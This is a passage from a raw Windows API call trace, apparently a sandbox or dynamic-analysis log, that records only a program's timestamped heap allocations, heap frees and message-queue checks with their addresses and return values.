hHeap=0x2af0000) returned 1 [0081.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64558 | out: hHeap=0x2af0000) returned 1 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64618 | out: hHeap=0x2af0000) returned 1 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0320 | out: hHeap=0x2af0000) returned 1 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0081.358] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0320 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646c0 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64720 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64540 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04c0 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04b0 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64768 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64660 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0600 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646d8 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0600 | out: hHeap=0x2af0000) returned 1 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646d8 | out: hHeap=0x2af0000) returned 1 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64660 | out: hHeap=0x2af0000) returned 1 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64768 | out: hHeap=0x2af0000) returned 1 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04b0 | out: hHeap=0x2af0000) returned 1 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645a0 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0600 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64630 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646d8 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04d0 [0081.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645d0 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04d0 | out: hHeap=0x2af0000) returned 1 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645d0 | out: hHeap=0x2af0000) returned 1 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646d8 | out: hHeap=0x2af0000) returned 1 [0081.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64630 | out: hHeap=0x2af0000) returned 1 [0081.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0600 | out: hHeap=0x2af0000) returned 1 [0081.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646d8 [0081.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04f0 [0081.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64768 [0081.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645d0 [0081.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0620 [0081.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64660 [0081.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0620 | out: hHeap=0x2af0000) returned 1 [0081.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64660 | out: hHeap=0x2af0000) returned 1 [0081.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645d0 | out: hHeap=0x2af0000) returned 1 [0081.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64768 | out: hHeap=0x2af0000) returned 1 [0081.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0081.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645a0 | out: hHeap=0x2af0000) returned 1 [0081.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646d8 | out: hHeap=0x2af0000) returned 1 [0081.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04c0 | out: hHeap=0x2af0000) returned 1 [0081.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64558 [0081.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646d8 [0081.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e04f0 [0081.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64540 | out: hHeap=0x2af0000) returned 1 [0081.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64720 | out: hHeap=0x2af0000) returned 1 [0081.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0610 [0081.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64660 [0081.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646d8 | out: hHeap=0x2af0000) returned 1 [0081.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64558 | out: hHeap=0x2af0000) returned 1 [0081.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0081.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0320 | out: hHeap=0x2af0000) returned 1 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64600 | out: hHeap=0x2af0000) returned 1 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64768 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0081.361] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64678 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0320 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646d8 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0320 | out: hHeap=0x2af0000) returned 1 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646d8 | out: hHeap=0x2af0000) returned 1 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64678 | out: hHeap=0x2af0000) returned 1 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0320 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64678 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0630 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64648 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0630 | out: hHeap=0x2af0000) returned 1 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64648 | out: hHeap=0x2af0000) returned 1 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64678 | out: hHeap=0x2af0000) returned 1 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0320 | out: hHeap=0x2af0000) returned 1 [0081.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.361] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0320 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646c0 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64720 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0540 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64618 [0081.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64678 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0660 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64630 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0680 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64558 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0680 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64558 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64630 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64780 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0660 | out: hHeap=0x2af0000) returned 1 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646d8 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04d0 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64630 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646f0 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0670 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645b8 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0670 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645b8 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646f0 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64630 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04d0 | out: hHeap=0x2af0000) returned 1 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0600 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64648 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645a0 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0640 [0081.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646f0 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0640 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646f0 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645a0 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64648 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0600 | out: hHeap=0x2af0000) returned 1 [0081.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64678 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646d8 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64618 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0540 | out: hHeap=0x2af0000) returned 1 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646d8 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0680 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64720 | out: hHeap=0x2af0000) returned 1 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0620 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646f0 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646d8 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0680 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0320 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64660 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0610 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64768 | out: hHeap=0x2af0000) returned 1 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64558 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0081.363] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0550 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646c0 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0580 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64600 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0580 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64600 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0081.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0540 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646c0 [0081.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64720 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64720 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646c0 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0540 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0550 | out: hHeap=0x2af0000) returned 1 [0081.364] PeekMessageW (in: lpMsg=0x8cf2d0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf2d0) returned 0 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64540 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04b0 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6bc0 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64738 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645a0 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0600 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645e8 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64600 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0630 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64768 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645b8 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0510 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0510 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645b8 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64768 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0630 | out: hHeap=0x2af0000) returned 1 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64660 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0610 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644c8 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04f0 [0081.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04f0 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644c8 | out: hHeap=0x2af0000) returned 1 [0081.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0610 | out: hHeap=0x2af0000) returned 1 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a645b8 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e04c0 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a646d8 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644e0 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05a0 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64618 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05a0 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64618 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644e0 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a646d8 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e04c0 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64600 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64660 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645b8 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645e8 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0600 | out: hHeap=0x2af0000) returned 1 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64780 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64798 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0540 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a645a0 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e04c0 [0081.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64720 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64798 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0540 | out: hHeap=0x2af0000) returned 1 [0081.365] HeapFree (in: 